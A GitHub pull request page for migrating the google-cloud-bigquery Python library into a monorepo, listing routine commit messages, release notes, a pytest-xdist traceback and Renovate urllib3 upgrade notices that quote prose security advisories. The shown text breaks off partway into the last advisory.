Skip to content

chore(migration): Migrate code from googleapis/python-bigquery into packages/google-cloud-bigquery#16008

Draft
parthea wants to merge 2071 commits intomainfrom
migration.python-bigquery.migration.2026-03-02_16-59-45.migrate
Draft

chore(migration): Migrate code from googleapis/python-bigquery into packages/google-cloud-bigquery#16008
parthea wants to merge 2071 commits intomainfrom
migration.python-bigquery.migration.2026-03-02_16-59-45.migrate

Conversation

@parthea
Copy link
Contributor

@parthea parthea commented Mar 2, 2026

See #10980.

This PR should be merged with a merge-commit, not a squash-commit, in order to preserve the git history.

Linchin and others added 30 commits May 6, 2024 16:46
* feat: support insertAll for range

* revert INTERVAL regex

* lint

* add unit test

* lint
* fix: add pyarrow version check for range support

* add comment why we are making a separate constant

---------

Co-authored-by: Tim Sweña (Swast) <swast@google.com>
* add new presubmit for test purposes

* add additional sessions

* Update .kokoro/presubmit/presubmit-2.cfg

* Update .kokoro/presubmit/presubmit-2.cfg

* added timer to nox sessions

* Update .kokoro/presubmit/presubmit-2.cfg

* 🦉 Updates from OwlBot post-processor

See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md

* 🦉 Updates from OwlBot post-processor

See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md

* removes references to most environment variables

* testing the use of base names for the nox sessions

* removes references to unneeded linting and typing env variables

* change file name and update env_vars in presubmit-2

* remove timed decorators

* revert several files

* Update noxfile.py

* remove test, remove unneeded vars, etc

---------

Co-authored-by: Owl Bot <gcf-owl-bot[bot]@users.noreply.github.com>
* feat: adds timer decorator to sessions

* updates _calculate_duration function

* 🦉 Updates from OwlBot post-processor

See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md

---------

Co-authored-by: Owl Bot <gcf-owl-bot[bot]@users.noreply.github.com>
* chore(deps): update all dependencies

* 🦉 Updates from OwlBot post-processor

See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md

* Update samples/geography/requirements.txt

---------

Co-authored-by: Owl Bot <gcf-owl-bot[bot]@users.noreply.github.com>
Co-authored-by: Chalmer Lowe <chalmerlowe@google.com>
Co-authored-by: release-please[bot] <55107282+release-please[bot]@users.noreply.github.com>
Co-authored-by: Chalmer Lowe <chalmerlowe@google.com>
* chore(deps): update all dependencies

* 🦉 Updates from OwlBot post-processor

See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md

* pin grpcio===1.62.2 for python 3.7

support of python 3.7 is dropped starting 1.63

---------

Co-authored-by: Owl Bot <gcf-owl-bot[bot]@users.noreply.github.com>
Co-authored-by: Lingqing Gan <lingqing.gan@gmail.com>
…1925)

* perf: decrease the threshold in which we use the BQ Storage Read API

* fix unit test

* update comment
Co-authored-by: release-please[bot] <55107282+release-please[bot]@users.noreply.github.com>
* Update format_options.py to include the newly added map target type.

The map target type creates a schema without the added key_value repeated field.

* Added tests

* add unit test

* lint

---------

Co-authored-by: Lingqing Gan <lingqing.gan@gmail.com>
* chore(deps): update all dependencies

* 🦉 Updates from OwlBot post-processor

See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md

---------

Co-authored-by: Owl Bot <gcf-owl-bot[bot]@users.noreply.github.com>
Co-authored-by: Lingqing Gan <lingqing.gan@gmail.com>
Co-authored-by: Leah E. Cole <6719667+leahecole@users.noreply.github.com>
Co-authored-by: Chalmer Lowe <chalmerlowe@google.com>
* chore(deps): update all dependencies

* 🦉 Updates from OwlBot post-processor

See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md

---------

Co-authored-by: Owl Bot <gcf-owl-bot[bot]@users.noreply.github.com>
#1933)

* chore(deps): bump requests from 2.31.0 to 2.32.2 in /samples/geography

Bumps [requests](https://github.com/psf/requests) from 2.31.0 to 2.32.2.
- [Release notes](https://github.com/psf/requests/releases)
- [Changelog](https://github.com/psf/requests/blob/main/HISTORY.md)
- [Commits](psf/requests@v2.31.0...v2.32.2)

---
updated-dependencies:
- dependency-name: requests
  dependency-type: direct:production
...

Signed-off-by: dependabot[bot] <support@github.com>

* pin requests==2.31.0 for python 3.7

---------

Signed-off-by: dependabot[bot] <support@github.com>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
Co-authored-by: Lingqing Gan <lingqing.gan@gmail.com>
* chore: add warning if storage module not found

* Update tests/unit/test_table.py

Co-authored-by: Chalmer Lowe <chalmerlowe@google.com>

* Update tests/unit/test_table.py

Co-authored-by: Chalmer Lowe <chalmerlowe@google.com>

---------

Co-authored-by: Chalmer Lowe <chalmerlowe@google.com>
* chore(deps): update all dependencies

* 🦉 Updates from OwlBot post-processor

See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md

* 🦉 Updates from OwlBot post-processor

See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md

---------

Co-authored-by: Owl Bot <gcf-owl-bot[bot]@users.noreply.github.com>
Co-authored-by: Chalmer Lowe <chalmerlowe@google.com>
* chore(deps): update all dependencies

* 🦉 Updates from OwlBot post-processor

See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md

---------

Co-authored-by: Owl Bot <gcf-owl-bot[bot]@users.noreply.github.com>
* feat: add default timeout for Client.get_job()

* change timeout type detection

* lint

* fix unit test and coverage

* add type hint

* fix type hint

* change import style and add comments

* remove sentinel value in client

* type hint

* typo

* add sentinel for query_and_wait()

* add unit tests

* fix unit test

* Update google/cloud/bigquery/job/query.py

Co-authored-by: Tim Sweña (Swast) <swast@google.com>

* Update google/cloud/bigquery/job/query.py

Co-authored-by: Tim Sweña (Swast) <swast@google.com>

* address comments

* typo

* type hint

* typos

---------

Co-authored-by: Tim Sweña (Swast) <swast@google.com>
This updates tests to use `max_iterations` rather than `max_iteration`
which was an alpha option.

Related: b/344469351
…thon (#1941)

Updates the regular continuous CI/CD checks to test against specific versions of Python (versions that aren't our most recent supported version and aren't our oldest supported version).

Also removes a CI/CD check that is superceded by a more recent version of check (prerelease-deps >>> replaced by prerelease-deps-3.12).

Modifies owlbot to avoid it adding prerelease-deps back into the mix since that file is a default in synthtool.
…use to download first page of results (#1942)

* perf: if `page_size` or `max_results` is set on `QueryJob.result()`, use to download first page of results

* add unit tests for query_and_wait

* populate maxResults on page 2

* fix maxResults

* fix coverage

---------

Co-authored-by: Lingqing Gan <lingqing.gan@gmail.com>
* fix: create query job in job.result() if doesn't exist

* Apply suggestions from code review

---------

Co-authored-by: Tim Sweña (Swast) <swast@google.com>
Co-authored-by: release-please[bot] <55107282+release-please[bot]@users.noreply.github.com>
…1949)

* test: update the results of test based on change to hacker news data

* Update tests/system/test_client.py

---------

Co-authored-by: Lingqing Gan <lingqing.gan@gmail.com>
* chore(deps): update all dependencies

* 🦉 Updates from OwlBot post-processor

See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md

---------

Co-authored-by: Owl Bot <gcf-owl-bot[bot]@users.noreply.github.com>
Co-authored-by: Lingqing Gan <lingqing.gan@gmail.com>
* chore(deps): update all dependencies

* 🦉 Updates from OwlBot post-processor

See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md

* Update samples/geography/requirements.txt

* Update samples/geography/requirements.txt

---------

Co-authored-by: Owl Bot <gcf-owl-bot[bot]@users.noreply.github.com>
Co-authored-by: Chalmer Lowe <chalmerlowe@google.com>
* feat: support load job option ColumnNameCharacterMap

* add unit test
…set (#1956)

* fix: do not overwrite page_size with max_results when start_index is set

* update test
renovate-bot and others added 27 commits October 1, 2025 13:59
* update pyproject.toml to follow PEP 639

* Update pyproject.toml PEP 639

Thanks for the feedback,
I've removed the version number completely as requested.

* Update pyproject.toml

---------

Co-authored-by: Chalmer Lowe <chalmerlowe@google.com>
* chore(python): Add Python 3.14 to python post processor image

Source-Link: googleapis/synthtool@16790a3
Post-Processor: gcr.io/cloud-devrel-public-resources/owlbot-python:latest@sha256:543e209e7c1c1ffe720eb4db1a3f045a75099304fb19aa11a47dc717b8aae2a9

* Update samples/snippets/noxfile.py

* Update samples/notebooks/noxfile.py

* Update samples/magics/noxfile.py

* Update samples/geography/noxfile.py

* Update samples/desktopapp/noxfile.py

* 🦉 Updates from OwlBot post-processor

See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md

* 🦉 Updates from OwlBot post-processor

See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md

* 🦉 Updates from OwlBot post-processor

See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md

* 🦉 Updates from OwlBot post-processor

See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md

* 🦉 Updates from OwlBot post-processor

See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md

---------

Co-authored-by: Owl Bot <gcf-owl-bot[bot]@users.noreply.github.com>
Co-authored-by: Chalmer Lowe <chalmerlowe@google.com>
* feat: Add ExternalRuntimeOptions to BigQuery routine

This change introduces the `ExternalRuntimeOptions` class to the
`google.cloud.bigquery.routine` module, allowing users to configure
runtime options for external routines.

Key changes:
- Created the `ExternalRuntimeOptions` class with setters and getters for
  `container_memory`, `container_cpu`, `runtime_connection`,
  `max_batching_rows`, and `runtime_version`.
- Updated the `Routine` class to include an `external_runtime_options`
  property that accepts an `ExternalRuntimeOptions` object.
- Added comprehensive unit tests for the new class and its integration
  with the `Routine` class, including tests for both valid and invalid
  input values.

* Update google/cloud/bigquery/routine/routine.py

* feat: Add ExternalRuntimeOptions to BigQuery routine

This change introduces the `ExternalRuntimeOptions` class to the
`google.cloud.bigquery.routine` module, allowing users to configure
runtime options for external routines.

Key changes:
- Created the `ExternalRuntimeOptions` class with setters and getters for
  `container_memory`, `container_cpu`, `runtime_connection`,
  `max_batching_rows`, and `runtime_version`.
- Updated the `Routine` class to include an `external_runtime_options`
  property that accepts an `ExternalRuntimeOptions` object.
- Added comprehensive unit tests for the new class and its integration
  with the `Routine` class, including tests for both valid and invalid
  input values.

* feat: Add ExternalRuntimeOptions to BigQuery routine

This change introduces the `ExternalRuntimeOptions` class to the
`google.cloud.bigquery.routine` module, allowing users to configure
runtime options for external routines.

Key changes:
- Created the `ExternalRuntimeOptions` class with setters and getters for
  `container_memory`, `container_cpu`, `runtime_connection`,
  `max_batching_rows`, and `runtime_version`.
- Updated the `Routine` class to include an `external_runtime_options`
  property that accepts an `ExternalRuntimeOptions` object.
- Added comprehensive unit tests for the new class and its integration
  with the `Routine` class, including tests for both valid and invalid
  input values.
- Added additional tests to improve code coverage based on feedback.

* feat: Add ExternalRuntimeOptions to BigQuery routine

This change introduces the `ExternalRuntimeOptions` class to the
`google.cloud.bigquery.routine` module, allowing users to configure
runtime options for external routines.

Key changes:
- Created the `ExternalRuntimeOptions` class with setters and getters for
  `container_memory`, `container_cpu`, `runtime_connection`,
  `max_batching_rows`, and `runtime_version`.
- Updated the `Routine` class to include an `external_runtime_options`
  property that accepts an `ExternalRuntimeOptions` object.
- Added comprehensive unit tests for the new class and its integration
  with the `Routine` class, including tests for both valid and invalid
  input values.
- Added additional tests to improve code coverage based on feedback.
- Addressed PyType errors by using helper functions for type conversion.

* Update tests/unit/routine/test_external_runtime_options.py

* feat: Add ExternalRuntimeOptions to BigQuery routine

This change introduces the `ExternalRuntimeOptions` class to the
`google.cloud.bigquery.routine` module, allowing users to configure
runtime options for external routines.

Key changes:
- Created the `ExternalRuntimeOptions` class with setters and getters for
  `container_memory`, `container_cpu`, `runtime_connection`,
  `max_batching_rows`, and `runtime_version`.
- Updated the `Routine` class to include an `external_runtime_options`
  property that accepts an `ExternalRuntimeOptions` object.
- Added comprehensive unit tests for the new class and its integration
  with the `Routine` class, including tests for both valid and invalid
  input values.
- Added additional tests to improve code coverage based on feedback.
- Addressed PyType errors by using helper functions for type conversion.
- Addressed formatting nits from code review.

---------

Co-authored-by: google-labs-jules[bot] <161369871+google-labs-jules[bot]@users.noreply.github.com>
Co-authored-by: Chalmer Lowe <chalmerlowe@google.com>
Co-authored-by: Lingqing Gan <lingqing.gan@gmail.com>
* feat: adds support for Python runtime 3.14

* adds step to install gdal

* adds files required by pyarrow

* adds repo required by pyarrow

* corrects url to repo required by pyarrow

* testing a theory with a conditional

* testing a theory with a conditional version of ubuntu

* testing a new approach to installing arrow

* testing a new approach to dearmoring the key

* back to the basics

* trying a conditional again.

* adds explanatory comment resets ubuntu version to latest

* Apply suggestion from @chalmerlowe

* Apply suggestion from @chalmerlowe

* Apply suggestion from @chalmerlowe

* Apply suggestion from @chalmerlowe
Towards googleapis/librarian#2456

Files removed which is no longer used
- Owlbot config files, including owlbot.py
- Sync repo settings config file 
- Release please config files
Temporarily pin `pytest < 9` to resolve the following issue

```
        for invalid_view_value in invalid_view_values:
>           with self.subTest(invalid_view_value=invalid_view_value):

tests/unit/test_client.py:810: 
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 
/opt/hostedtoolcache/Python/3.11.14/x64/lib/python3.11/contextlib.py:144: in __exit__
    next(self.gen)
/opt/hostedtoolcache/Python/3.11.14/x64/lib/python3.11/contextlib.py:144: in __exit__
    next(self.gen)
.nox/unit-3-11/lib/python3.11/site-packages/_pytest/unittest.py:438: in addSubTest
    self.ihook.pytest_runtest_logreport(report=sub_report)
.nox/unit-3-11/lib/python3.11/site-packages/pluggy/_hooks.py:512: in __call__
    return self._hookexec(self.name, self._hookimpls.copy(), kwargs, firstresult)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
.nox/unit-3-11/lib/python3.11/site-packages/pluggy/_manager.py:120: in _hookexec
    return self._inner_hookexec(hook_name, methods, kwargs, firstresult)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
.nox/unit-3-11/lib/python3.11/site-packages/xdist/remote.py:289: in pytest_runtest_logreport
    self.sendevent("testreport", data=data)
.nox/unit-3-11/lib/python3.11/site-packages/xdist/remote.py:126: in sendevent
    self.channel.send((name, kwargs))
.nox/unit-3-11/lib/python3.11/site-packages/execnet/gateway_base.py:912: in send
    self.gateway._send(Message.CHANNEL_DATA, self.id, dumps_internal(item))
                                                      ^^^^^^^^^^^^^^^^^^^^
.nox/unit-3-11/lib/python3.11/site-packages/execnet/gateway_base.py:1629: in dumps_internal
    return _Serializer().save(obj)  # type: ignore[return-value]
           ^^^^^^^^^^^^^^^^^^^^^^^
.nox/unit-3-11/lib/python3.11/site-packages/execnet/gateway_base.py:1647: in save
    self._save(obj)
.nox/unit-3-11/lib/python3.11/site-packages/execnet/gateway_base.py:1667: in _save
    dispatch(self, obj)
.nox/unit-3-11/lib/python3.11/site-packages/execnet/gateway_base.py:1744: in save_tuple
    self._save(item)
.nox/unit-3-11/lib/python3.11/site-packages/execnet/gateway_base.py:1667: in _save
    dispatch(self, obj)
.nox/unit-3-11/lib/python3.11/site-packages/execnet/gateway_base.py:1740: in save_dict
    self._write_setitem(key, value)
.nox/unit-3-11/lib/python3.11/site-packages/execnet/gateway_base.py:1734: in _write_setitem
    self._save(value)
.nox/unit-3-11/lib/python3.11/site-packages/execnet/gateway_base.py:1667: in _save
    dispatch(self, obj)
.nox/unit-3-11/lib/python3.11/site-packages/execnet/gateway_base.py:1740: in save_dict
    self._write_setitem(key, value)
.nox/unit-3-11/lib/python3.11/site-packages/execnet/gateway_base.py:1734: in _write_setitem
    self._save(value)
.nox/unit-3-11/lib/python3.11/site-packages/execnet/gateway_base.py:1667: in _save
    dispatch(self, obj)
.nox/unit-3-11/lib/python3.11/site-packages/execnet/gateway_base.py:1740: in save_dict
    self._write_setitem(key, value)
.nox/unit-3-11/lib/python3.11/site-packages/execnet/gateway_base.py:1734: in _write_setitem
    self._save(value)
.nox/unit-3-11/lib/python3.11/site-packages/execnet/gateway_base.py:1667: in _save
    dispatch(self, obj)
.nox/unit-3-11/lib/python3.11/site-packages/execnet/gateway_base.py:1740: in save_dict
    self._write_setitem(key, value)
.nox/unit-3-11/lib/python3.11/site-packages/execnet/gateway_base.py:1734: in _write_setitem
    self._save(value)
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 

self = <execnet.gateway_base._Serializer object at 0x7fc425a0c710>
obj = <object object at 0x7fc425bcb920>

    def _save(self, obj: object) -> None:
        tp = type(obj)
        try:
            dispatch = self._dispatch[tp]
        except KeyError:
            methodname = "save_" + tp.__name__
            meth: Callable[[_Serializer, object], None] | None = getattr(
                self.__class__, methodname, None
            )
            if meth is None:
>               raise DumpError(f"can't serialize {tp}") from None
E               execnet.gateway_base.DumpError: can't serialize <class 'object'>
```

The upstream issue is tracked in
pytest-dev/pytest-xdist#1273
This PR updates the librarian sha to support v1.0.0
…e with pyarrow (#2338)

Due to an issue with `pyarrow`, a significant dependency for certain
python-bigquery use cases, not being compatible with Python 3.14, we
temporarily skipped the failing CI/CD check for 3.14 while awaiting the
update to pyarrow. Pyarrow is now fully compatible, so that filter is
being removed.

**KNOWN ISSUES**: this will show that unittests for 3.14 are failing.
This has nothing to do with this PR/these changes. It is being addressed
in an alternate mod. It is due to a missing dependency related to
handling IO for `geopandas` (namely it is missing `libgdal-dev`, etc
which are normally installed with `pyogrio` + `geopandas`). Because
`pyogrio` is currently not compatible with Python 3.14 the tests in 3.14
cannot complete.

This should not prevent **this PR from being merged** to help solve the
current issue, which is a blocker for getting our continuous tests to
green.
This PR effectively moves ownership for this repo to the python language
team, and removes api-bigquery as the defacto code owner.
PR created by the Librarian CLI to initialize a release. Merging this PR
will auto trigger a release.

Librarian Version: v0.7.0
Language Image:
us-central1-docker.pkg.dev/cloud-sdk-librarian-prod/images-prod/python-librarian-generator@sha256:c8612d3fffb3f6a32353b2d1abd16b61e87811866f7ec9d65b59b02eb452a620
<details><summary>google-cloud-bigquery: 3.39.0</summary>

##
[3.39.0](googleapis/python-bigquery@v3.38.0...v3.39.0)
(2025-12-12)

### Features

* adds support for Python runtime 3.14 (#2322)
([6065e14c](googleapis/python-bigquery@6065e14c))

* Add ExternalRuntimeOptions to BigQuery routine (#2311)
([fa76e310](googleapis/python-bigquery@fa76e310))

### Bug Fixes

* remove ambiguous error codes from query retries (#2308)
([8bbd3d01](googleapis/python-bigquery@8bbd3d01))

* include `io.Base` in the `PathType` (#2323)
([b11e09cb](googleapis/python-bigquery@b11e09cb))

* honor custom `retry` in `job.result()` (#2302)
([e118b029](googleapis/python-bigquery@e118b029))

### Documentation

* remove experimental annotations from GA features (#2303)
([1f1f9d41](googleapis/python-bigquery@1f1f9d41))

</details>

Co-authored-by: Daniel Sanche <d.sanche14@gmail.com>
This PR contains the following updates:

| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [urllib3](https://redirect.github.com/urllib3/urllib3)
([changelog](https://redirect.github.com/urllib3/urllib3/blob/main/CHANGES.rst))
| `==2.5.0` -> `==2.6.0` |
![age](https://developer.mend.io/api/mc/badges/age/pypi/urllib3/2.6.0?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/pypi/urllib3/2.5.0/2.6.0?slim=true)
|

### GitHub Vulnerability Alerts

####
[CVE-2025-66418](https://redirect.github.com/urllib3/urllib3/security/advisories/GHSA-gm62-xv2j-4w53)

## Impact

urllib3 supports chained HTTP encoding algorithms for response content
according to RFC 9110 (e.g., `Content-Encoding: gzip, zstd`).

However, the number of links in the decompression chain was unbounded
allowing a malicious server to insert a virtually unlimited number of
compression steps leading to high CPU usage and massive memory
allocation for the decompressed data.

## Affected usages

Applications and libraries using urllib3 version 2.5.0 and earlier for
HTTP requests to untrusted sources unless they disable content decoding
explicitly.

## Remediation

Upgrade to at least urllib3 v2.6.0 in which the library limits the
number of links to 5.

If upgrading is not immediately possible, use
[`preload_content=False`](https://urllib3.readthedocs.io/en/2.5.0/advanced-usage.html#streaming-and-i-o)
and ensure that `resp.headers["content-encoding"]` contains a safe
number of encodings before reading the response content.

####
[CVE-2025-66471](https://redirect.github.com/urllib3/urllib3/security/advisories/GHSA-2xpw-w6gg-jr37)

### Impact

urllib3's [streaming
API](https://urllib3.readthedocs.io/en/2.5.0/advanced-usage.html#streaming-and-i-o)
is designed for the efficient handling of large HTTP responses by
reading the content in chunks, rather than loading the entire response
body into memory at once.

When streaming a compressed response, urllib3 can perform decoding or
decompression based on the HTTP `Content-Encoding` header (e.g., `gzip`,
`deflate`, `br`, or `zstd`). The library must read compressed data from
the network and decompress it until the requested chunk size is met. Any
resulting decompressed data that exceeds the requested amount is held in
an internal buffer for the next read operation.

The decompression logic could cause urllib3 to fully decode a small
amount of highly compressed data in a single operation. This can result
in excessive resource consumption (high CPU usage and massive memory
allocation for the decompressed data; CWE-409) on the client side, even
if the application only requested a small chunk of data.

### Affected usages

Applications and libraries using urllib3 version 2.5.0 and earlier to
stream large compressed responses or content from untrusted sources.

`stream()`, `read(amt=256)`, `read1(amt=256)`, `read_chunked(amt=256)`,
`readinto(b)` are examples of `urllib3.HTTPResponse` method calls using
the affected logic unless decoding is disabled explicitly.

### Remediation

Upgrade to at least urllib3 v2.6.0 in which the library avoids
decompressing data that exceeds the requested amount.

If your environment contains a package facilitating the Brotli encoding,
upgrade to at least Brotli 1.2.0 or brotlicffi 1.2.0.0 too. These
versions are enforced by the `urllib3[brotli]` extra in the patched
versions of urllib3.

### Credits

The issue was reported by @&#8203;Cycloctane.
Supplemental information was provided by @&#8203;stamparm during a
security audit performed by [7ASecurity](https://7asecurity.com/) and
facilitated by [OSTIF](https://ostif.org/).

---

### Release Notes

<details>
<summary>urllib3/urllib3 (urllib3)</summary>

###
[`v2.6.0`](https://redirect.github.com/urllib3/urllib3/blob/HEAD/CHANGES.rst#260-2025-12-05)

[Compare
Source](https://redirect.github.com/urllib3/urllib3/compare/2.5.0...2.6.0)

\==================

## Security

- Fixed a security issue where streaming API could improperly handle
highly
compressed HTTP content ("decompression bombs") leading to excessive
resource
consumption even when a small amount of data was requested. Reading
small
  chunks of compressed data is safer and much more efficient now.
(`GHSA-2xpw-w6gg-jr37
<https://github.com/urllib3/urllib3/security/advisories/GHSA-2xpw-w6gg-jr37>`\_\_)
- Fixed a security issue where an attacker could compose an HTTP
response with
virtually unlimited links in the `Content-Encoding` header, potentially
leading to a denial of service (DoS) attack by exhausting system
resources
during decoding. The number of allowed chained encodings is now limited
to 5.
(`GHSA-gm62-xv2j-4w53
<https://github.com/urllib3/urllib3/security/advisories/GHSA-gm62-xv2j-4w53>`\_\_)

.. caution::

- If urllib3 is not installed with the optional `urllib3[brotli]` extra,
but
your environment contains a Brotli/brotlicffi/brotlipy package anyway,
make
  sure to upgrade it to at least Brotli 1.2.0 or brotlicffi 1.2.0.0 to
  benefit from the security fixes and avoid warnings. Prefer using
`urllib3[brotli]` to install a compatible Brotli package automatically.

- If you use custom decompressors, please make sure to update them to
  respect the changed API of `urllib3.response.ContentDecoder`.

## Features

- Enabled retrieval, deletion, and membership testing in
`HTTPHeaderDict` using bytes keys. (`#&#8203;3653
<https://github.com/urllib3/urllib3/issues/3653>`\_\_)
- Added host and port information to string representations of
`HTTPConnection`. (`#&#8203;3666
<https://github.com/urllib3/urllib3/issues/3666>`\_\_)
- Added support for Python 3.14 free-threading builds explicitly.
(`#&#8203;3696 <https://github.com/urllib3/urllib3/issues/3696>`\_\_)

## Removals

- Removed the `HTTPResponse.getheaders()` method in favor of
`HTTPResponse.headers`.
Removed the `HTTPResponse.getheader(name, default)` method in favor of
`HTTPResponse.headers.get(name, default)`. (`#&#8203;3622
<https://github.com/urllib3/urllib3/issues/3622>`\_\_)

## Bugfixes

- Fixed redirect handling in `urllib3.PoolManager` when an integer is
passed
for the retries parameter. (`#&#8203;3649
<https://github.com/urllib3/urllib3/issues/3649>`\_\_)
- Fixed `HTTPConnectionPool` when used in Emscripten with no explicit
port. (`#&#8203;3664
<https://github.com/urllib3/urllib3/issues/3664>`\_\_)
- Fixed handling of `SSLKEYLOGFILE` with expandable variables.
(`#&#8203;3700 <https://github.com/urllib3/urllib3/issues/3700>`\_\_)

## Misc

- Changed the `zstd` extra to install `backports.zstd` instead of
`zstandard` on Python 3.13 and before. (`#&#8203;3693
<https://github.com/urllib3/urllib3/issues/3693>`\_\_)
- Improved the performance of content decoding by optimizing
`BytesQueueBuffer` class. (`#&#8203;3710
<https://github.com/urllib3/urllib3/issues/3710>`\_\_)
- Allowed building the urllib3 package with newer setuptools-scm v9.x.
(`#&#8203;3652 <https://github.com/urllib3/urllib3/issues/3652>`\_\_)
- Ensured successful urllib3 builds by setting Hatchling requirement to
>= 1.27.0. (`#&#8203;3638
<https://github.com/urllib3/urllib3/issues/3638>`\_\_)

</details>

---

### Configuration

📅 **Schedule**: Branch creation - "" (UTC), Automerge - At any time (no
schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/googleapis/python-bigquery).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0Mi4zMi4yIiwidXBkYXRlZEluVmVyIjoiNDIuMzIuMiIsInRhcmdldEJyYW5jaCI6Im1haW4iLCJsYWJlbHMiOltdfQ==-->

Co-authored-by: Lingqing Gan <lingqing.gan@gmail.com>
Thank you for opening a Pull Request! Before submitting your PR, there
are a few things you can do to make sure it goes smoothly:
- [ ] Make sure to open an issue as a
[bug/issue](https://github.com/googleapis/python-bigquery/issues/new/choose)
before writing your code! That way we can discuss the change, evaluate
designs, and agree on the general idea
- [ ] Ensure the tests and linter pass
- [ ] Code coverage does not decrease (if any source code was changed)
- [ ] Appropriate docs were updated (if necessary)

Fixes #<issue_number_goes_here> 🦕

---------

Co-authored-by: gemini-code-assist[bot] <176961590+gemini-code-assist[bot]@users.noreply.github.com>
PR created by the Librarian CLI to initialize a release. Merging this PR
will auto trigger a release.

Librarian Version: v0.7.0
Language Image:
us-central1-docker.pkg.dev/cloud-sdk-librarian-prod/images-prod/python-librarian-generator@sha256:c8612d3fffb3f6a32353b2d1abd16b61e87811866f7ec9d65b59b02eb452a620
<details><summary>google-cloud-bigquery: 3.40.0</summary>

##
[3.40.0](googleapis/python-bigquery@v3.39.0...v3.40.0)
(2026-01-08)

### Features

* support load_table and list_rows with picosecond timestamp (#2351)
([46764a59](googleapis/python-bigquery@46764a59))

* support timestamp_precision in table schema (#2333)
([8d5785ae](googleapis/python-bigquery@8d5785ae))

</details>
### Description

This PR adds a `timeout` parameter to the `to_dataframe()` and
`to_arrow()` methods (and their corresponding `*_iterable`,
`*_geodataframe` and `QueryJob` wrappers) in the BigQuery client
library.

This addresses an issue where these methods could hang indefinitely if
the underlying BigQuery Storage API stream blocked (e.g., due to
firewall issues or network interruptions) during the download phase. The
added `timeout` parameter ensures that the download operation respects
the specified time limit and raises a `concurrent.futures.TimeoutError`
if it exceeds the duration.

### Changes

-   Modified `google/cloud/bigquery/_pandas_helpers.py`:
- Updated `_download_table_bqstorage` to accept a `timeout` argument.
    -   Implemented a timeout check within the result processing loop.
- Updated wrapper functions `download_dataframe_bqstorage` and
`download_arrow_bqstorage` to accept and pass the `timeout` parameter.
-   Modified `google/cloud/bigquery/table.py`:
- Updated `RowIterator` methods (`to_arrow_iterable`, `to_arrow`,
`to_dataframe_iterable`, `to_dataframe`, `to_geodataframe`) to accept
and pass `timeout`.
- Updated `_EmptyRowIterator` methods to match the `RowIterator`
signature, preventing `TypeError` when a timeout is provided for empty
result sets.
-   Modified `google/cloud/bigquery/job/query.py`:
- Updated `QueryJob` methods (`to_arrow`, `to_dataframe`,
`to_geodataframe`) to accept `timeout` and pass it to the result
iterator.
- Updated unit tests in `tests/unit/job/test_query_pandas.py`,
`tests/unit/test_table.py`, and `tests/unit/test_table_pandas.py` to
reflect the signature changes.

Fixes internal bug: b/468091307
#2349)

…ted by page_size in query_and_wait

Fixes internal issue b/433324499

Thank you for opening a Pull Request! Before submitting your PR, there
are a few things you can do to make sure it goes smoothly:
- [ ] Make sure to open an issue as a
[bug/issue](https://github.com/googleapis/python-bigquery/issues/new/choose)
before writing your code! That way we can discuss the change, evaluate
designs, and agree on the general idea
- [ ] Ensure the tests and linter pass
- [ ] Code coverage does not decrease (if any source code was changed)
- [ ] Appropriate docs were updated (if necessary)

Fixes #<issue_number_goes_here> 🦕

Co-authored-by: Lingqing Gan <lingqing.gan@gmail.com>
This PR contains the following updates:

| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [urllib3](https://redirect.github.com/urllib3/urllib3)
([changelog](https://redirect.github.com/urllib3/urllib3/blob/main/CHANGES.rst))
| `==2.6.0` → `==2.6.3` |
![age](https://developer.mend.io/api/mc/badges/age/pypi/urllib3/2.6.3?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/pypi/urllib3/2.6.0/2.6.3?slim=true)
|

### GitHub Vulnerability Alerts

####
[CVE-2026-21441](https://redirect.github.com/urllib3/urllib3/security/advisories/GHSA-38jv-5279-wg99)

### Impact

urllib3's [streaming
API](https://urllib3.readthedocs.io/en/2.6.2/advanced-usage.html#streaming-and-i-o)
